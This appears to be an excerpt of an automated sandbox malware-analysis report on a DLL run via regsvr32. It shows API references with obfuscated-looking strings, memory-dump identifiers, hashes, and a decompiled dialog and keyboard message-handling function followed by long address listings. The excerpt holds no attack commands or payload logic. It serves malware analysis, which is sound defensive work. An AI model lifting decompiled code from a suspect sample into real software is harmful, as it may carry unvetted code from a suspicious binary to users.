                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001C32
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001C5B
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001C81
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001CAC
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001CD5
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001CFF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001D35
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001D57
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10001D7D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 69c51003af96275454d602057090bf2f3f4a2519da6507d6aeea24ce666c7f9e
                                                                                                            • Instruction ID: 0456d89d922e5c10c0a98bb53afe019d0a386320811ad7c1ac40a02f71bd5ba4
                                                                                                            • Opcode Fuzzy Hash: 69c51003af96275454d602057090bf2f3f4a2519da6507d6aeea24ce666c7f9e
                                                                                                            • Instruction Fuzzy Hash: 71710875548355AFE304DF51CE82F1BBBE8EBCAB44F01580EF6809B2A1C670E9148F66
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001AEE4 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E1001AEE4(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				void* _t234;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E1001AD41(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E10009228(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E1000911A( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = L1001AD93(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E1001A83E(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if(__eflags == 0) {
								E10004E6E(0, _t232, _t238, _t247, __eflags);
								asm("int3");
								_push(0x28);
								E1001FBF7(E10034708, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E1000A8F0(0, _t232, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E1000A8F0(_t229, _t232, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E1001A7F1(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E1001A7F1(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E1000F80A(_t229, _t232, _t240);
																	} else {
																		_t172 = E1000F7BC(_t229, _t232, _t240);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E1000F366(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E1001A8AF(_a4, _v24, _v44);
																			} else {
																				_t174 = E1000A8F0(_t229, _t232, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E1001A8E9(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E1000F223(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E10007A94(_t255, _v36, _t229);
																			} else {
																				_t191 = E1000A8F0(_t229, _t232, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E1001A8E9(_t244);
																				E1001AAB3(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E1001A88E(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E1001AC34(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E1000EF39(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E1000EFB3(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E1000F010();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E1001AB2E(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E1001A7F1(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E1001AEE4(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E10014E50(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E1000A8F0(_t229, _t232, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E1001AA46(_t232, E1000A8F0(_t229, _t232, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E1001AAB3(_t229, _t232, _t260, _v24, E1000A8F0(_t229, _t232, _t260, GetFocus()));
															_pop(_t234);
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E1001AC61(_a4, _v24, E1000A8F0(_t229, _t234, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E1000A8F0(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E1000A8F0(_t229, _t232, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E1001FC9C(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E1000F223(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}





































































                                                                                                            0x1001aee4
                                                                                                            0x1001aee5
                                                                                                            0x1001aee7
                                                                                                            0x1001aee8
                                                                                                            0x1001aeec
                                                                                                            0x1001aeed
                                                                                                            0x1001aeee
                                                                                                            0x1001aef5
                                                                                                            0x1001aefa
                                                                                                            0x1001aefe
                                                                                                            0x1001af00
                                                                                                            0x1001af08
                                                                                                            0x1001af0c
                                                                                                            0x1001af0e
                                                                                                            0x1001af13
                                                                                                            0x1001af16
                                                                                                            0x1001af18
                                                                                                            0x1001af1c
                                                                                                            0x1001af1c
                                                                                                            0x1001af24
                                                                                                            0x1001af26
                                                                                                            0x1001af2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001af35
                                                                                                            0x1001af45
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001af47
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001af35
                                                                                                            0x1001af49
                                                                                                            0x1001af49
                                                                                                            0x1001af16
                                                                                                            0x1001af0c
                                                                                                            0x1001af4b
                                                                                                            0x1001af4b
                                                                                                            0x1001af4d
                                                                                                            0x1001af59
                                                                                                            0x1001af5f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001af62
                                                                                                            0x1001af69
                                                                                                            0x1001af6a
                                                                                                            0x1001af7c
                                                                                                            0x1001af7e
                                                                                                            0x1001afa1
                                                                                                            0x1001afa1
                                                                                                            0x1001afa4
                                                                                                            0x1001afd4
                                                                                                            0x1001afd9
                                                                                                            0x1001afda
                                                                                                            0x1001afe1
                                                                                                            0x1001afe6
                                                                                                            0x1001afe9
                                                                                                            0x1001afeb
                                                                                                            0x1001aff5
                                                                                                            0x1001afed
                                                                                                            0x1001afed
                                                                                                            0x1001afed
                                                                                                            0x1001aff8
                                                                                                            0x1001affb
                                                                                                            0x1001affe
                                                                                                            0x1001b008
                                                                                                            0x1001b00b
                                                                                                            0x1001b010
                                                                                                            0x1001b015
                                                                                                            0x1001b017
                                                                                                            0x1001b01a
                                                                                                            0x1001b024
                                                                                                            0x1001b02a
                                                                                                            0x1001b02d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b01c
                                                                                                            0x1001b01c
                                                                                                            0x1001b022
                                                                                                            0x1001b033
                                                                                                            0x1001b033
                                                                                                            0x1001b035
                                                                                                            0x1001b0e2
                                                                                                            0x1001b0e4
                                                                                                            0x1001b0e6
                                                                                                            0x1001b0e9
                                                                                                            0x1001b0ee
                                                                                                            0x1001b0f1
                                                                                                            0x1001b0f7
                                                                                                            0x1001b0f7
                                                                                                            0x1001b0f9
                                                                                                            0x1001b100
                                                                                                            0x1001b18a
                                                                                                            0x1001b18f
                                                                                                            0x1001b193
                                                                                                            0x1001b196
                                                                                                            0x1001b2d3
                                                                                                            0x1001b2d6
                                                                                                            0x00000000
                                                                                                            0x1001b2dc
                                                                                                            0x1001b2dc
                                                                                                            0x1001b2df
                                                                                                            0x1001b38f
                                                                                                            0x00000000
                                                                                                            0x1001b2e5
                                                                                                            0x1001b2e5
                                                                                                            0x1001b2e8
                                                                                                            0x1001b396
                                                                                                            0x1001b39a
                                                                                                            0x1001b39f
                                                                                                            0x1001b3a1
                                                                                                            0x00000000
                                                                                                            0x1001b3a7
                                                                                                            0x1001b3a7
                                                                                                            0x1001b3ab
                                                                                                            0x1001b3ae
                                                                                                            0x1001b3b0
                                                                                                            0x1001b3b9
                                                                                                            0x1001b3b2
                                                                                                            0x1001b3b2
                                                                                                            0x1001b3b2
                                                                                                            0x1001b3be
                                                                                                            0x1001b3c0
                                                                                                            0x1001b3c2
                                                                                                            0x00000000
                                                                                                            0x1001b3c8
                                                                                                            0x1001b3c8
                                                                                                            0x1001b3cc
                                                                                                            0x1001b3ce
                                                                                                            0x1001b3d2
                                                                                                            0x1001b3d2
                                                                                                            0x1001b3d7
                                                                                                            0x1001b3db
                                                                                                            0x1001b3eb
                                                                                                            0x1001b3ed
                                                                                                            0x1001b3ef
                                                                                                            0x1001b3fc
                                                                                                            0x1001b402
                                                                                                            0x1001b3f1
                                                                                                            0x1001b3f2
                                                                                                            0x1001b3f2
                                                                                                            0x1001b407
                                                                                                            0x1001b409
                                                                                                            0x1001b40b
                                                                                                            0x00000000
                                                                                                            0x1001b411
                                                                                                            0x1001b417
                                                                                                            0x1001b41a
                                                                                                            0x1001b41d
                                                                                                            0x1001b422
                                                                                                            0x1001b425
                                                                                                            0x1001b432
                                                                                                            0x1001b432
                                                                                                            0x00000000
                                                                                                            0x1001b425
                                                                                                            0x1001b3dd
                                                                                                            0x1001b3dd
                                                                                                            0x1001b3e3
                                                                                                            0x00000000
                                                                                                            0x1001b3e3
                                                                                                            0x1001b3db
                                                                                                            0x1001b3c2
                                                                                                            0x1001b2ee
                                                                                                            0x1001b2ee
                                                                                                            0x1001b2f1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b2f1
                                                                                                            0x1001b2e8
                                                                                                            0x1001b2df
                                                                                                            0x00000000
                                                                                                            0x1001b19c
                                                                                                            0x1001b19c
                                                                                                            0x1001b32b
                                                                                                            0x1001b32b
                                                                                                            0x1001b32b
                                                                                                            0x00000000
                                                                                                            0x1001b1a2
                                                                                                            0x1001b1a2
                                                                                                            0x1001b1a5
                                                                                                            0x00000000
                                                                                                            0x1001b1ab
                                                                                                            0x1001b1ab
                                                                                                            0x1001b1ae
                                                                                                            0x1001b24d
                                                                                                            0x1001b24f
                                                                                                            0x00000000
                                                                                                            0x1001b255
                                                                                                            0x1001b257
                                                                                                            0x1001b25d
                                                                                                            0x1001b262
                                                                                                            0x1001b265
                                                                                                            0x1001b268
                                                                                                            0x1001b26d
                                                                                                            0x1001b272
                                                                                                            0x1001b274
                                                                                                            0x00000000
                                                                                                            0x1001b27a
                                                                                                            0x1001b27a
                                                                                                            0x1001b27e
                                                                                                            0x1001b293
                                                                                                            0x1001b295
                                                                                                            0x1001b297
                                                                                                            0x1001b2a5
                                                                                                            0x1001b2a7
                                                                                                            0x1001b299
                                                                                                            0x1001b29a
                                                                                                            0x1001b29a
                                                                                                            0x1001b2ac
                                                                                                            0x1001b2ae
                                                                                                            0x1001b2b0
                                                                                                            0x1001b2b9
                                                                                                            0x1001b2be
                                                                                                            0x1001b2c7
                                                                                                            0x1001b2cd
                                                                                                            0x1001b2cd
                                                                                                            0x1001b280
                                                                                                            0x1001b280
                                                                                                            0x1001b286
                                                                                                            0x1001b288
                                                                                                            0x1001b288
                                                                                                            0x00000000
                                                                                                            0x1001b27e
                                                                                                            0x1001b274
                                                                                                            0x00000000
                                                                                                            0x1001b1b4
                                                                                                            0x1001b1b4
                                                                                                            0x1001b1b7
                                                                                                            0x1001b2f7
                                                                                                            0x1001b2f7
                                                                                                            0x1001b2f9
                                                                                                            0x00000000
                                                                                                            0x1001b2ff
                                                                                                            0x1001b302
                                                                                                            0x1001b307
                                                                                                            0x1001b309
                                                                                                            0x1001b30a
                                                                                                            0x1001b31b
                                                                                                            0x1001b30c
                                                                                                            0x1001b30c
                                                                                                            0x1001b30f
                                                                                                            0x1001b311
                                                                                                            0x1001b311
                                                                                                            0x1001b320
                                                                                                            0x1001b322
                                                                                                            0x1001b324
                                                                                                            0x1001b327
                                                                                                            0x1001b342
                                                                                                            0x1001b342
                                                                                                            0x1001b344
                                                                                                            0x1001b349
                                                                                                            0x1001b34b
                                                                                                            0x1001b359
                                                                                                            0x1001b35c
                                                                                                            0x00000000
                                                                                                            0x1001b362
                                                                                                            0x1001b362
                                                                                                            0x1001b363
                                                                                                            0x1001b364
                                                                                                            0x1001b365
                                                                                                            0x1001b367
                                                                                                            0x1001b36c
                                                                                                            0x1001b36d
                                                                                                            0x1001b370
                                                                                                            0x1001b378
                                                                                                            0x00000000
                                                                                                            0x1001b378
                                                                                                            0x1001b34d
                                                                                                            0x1001b34e
                                                                                                            0x00000000
                                                                                                            0x1001b34e
                                                                                                            0x1001b329
                                                                                                            0x1001b32d
                                                                                                            0x1001b338
                                                                                                            0x1001b33a
                                                                                                            0x1001b33c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b33c
                                                                                                            0x1001b327
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b1b7
                                                                                                            0x1001b1ae
                                                                                                            0x1001b1a5
                                                                                                            0x1001b19c
                                                                                                            0x00000000
                                                                                                            0x1001b106
                                                                                                            0x1001b107
                                                                                                            0x1001b107
                                                                                                            0x1001b108
                                                                                                            0x1001b134
                                                                                                            0x1001b138
                                                                                                            0x1001b13d
                                                                                                            0x1001b144
                                                                                                            0x1001b14a
                                                                                                            0x1001b14a
                                                                                                            0x1001b14e
                                                                                                            0x1001b152
                                                                                                            0x1001b158
                                                                                                            0x1001b158
                                                                                                            0x1001b15c
                                                                                                            0x00000000
                                                                                                            0x1001b162
                                                                                                            0x1001b162
                                                                                                            0x1001b169
                                                                                                            0x1001b16e
                                                                                                            0x1001b170
                                                                                                            0x00000000
                                                                                                            0x1001b172
                                                                                                            0x1001b172
                                                                                                            0x1001b175
                                                                                                            0x1001b177
                                                                                                            0x00000000
                                                                                                            0x1001b179
                                                                                                            0x1001b17a
                                                                                                            0x1001b17c
                                                                                                            0x1001b438
                                                                                                            0x1001b438
                                                                                                            0x1001b438
                                                                                                            0x1001b177
                                                                                                            0x00000000
                                                                                                            0x1001b170
                                                                                                            0x1001b154
                                                                                                            0x1001b154
                                                                                                            0x1001b156
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b156
                                                                                                            0x1001b146
                                                                                                            0x1001b146
                                                                                                            0x1001b148
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b148
                                                                                                            0x1001b10a
                                                                                                            0x1001b10a
                                                                                                            0x1001b10d
                                                                                                            0x1001b1bd
                                                                                                            0x1001b1bd
                                                                                                            0x1001b1c0
                                                                                                            0x1001b1c6
                                                                                                            0x1001b1ce
                                                                                                            0x1001b1d4
                                                                                                            0x1001b1d6
                                                                                                            0x1001b1d9
                                                                                                            0x1001b1e4
                                                                                                            0x1001b1e9
                                                                                                            0x1001b1ec
                                                                                                            0x1001b1f7
                                                                                                            0x1001b1fc
                                                                                                            0x1001b1fc
                                                                                                            0x1001b1ec
                                                                                                            0x1001b1d9
                                                                                                            0x1001b1fd
                                                                                                            0x1001b206
                                                                                                            0x1001b208
                                                                                                            0x1001b20a
                                                                                                            0x1001b21e
                                                                                                            0x1001b224
                                                                                                            0x1001b228
                                                                                                            0x1001b22a
                                                                                                            0x1001b22c
                                                                                                            0x1001b23d
                                                                                                            0x1001b23d
                                                                                                            0x1001b22c
                                                                                                            0x1001b242
                                                                                                            0x1001b113
                                                                                                            0x1001b113
                                                                                                            0x1001b116
                                                                                                            0x1001b129
                                                                                                            0x1001b129
                                                                                                            0x1001b12e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b118
                                                                                                            0x1001b11a
                                                                                                            0x1001b120
                                                                                                            0x1001b123
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b123
                                                                                                            0x1001b116
                                                                                                            0x1001b10d
                                                                                                            0x1001b108
                                                                                                            0x1001b03b
                                                                                                            0x1001b041
                                                                                                            0x1001b043
                                                                                                            0x1001b043
                                                                                                            0x1001b047
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b04f
                                                                                                            0x1001b054
                                                                                                            0x1001b057
                                                                                                            0x1001b064
                                                                                                            0x1001b066
                                                                                                            0x1001b068
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b068
                                                                                                            0x00000000
                                                                                                            0x1001b057
                                                                                                            0x1001b06a
                                                                                                            0x1001b06c
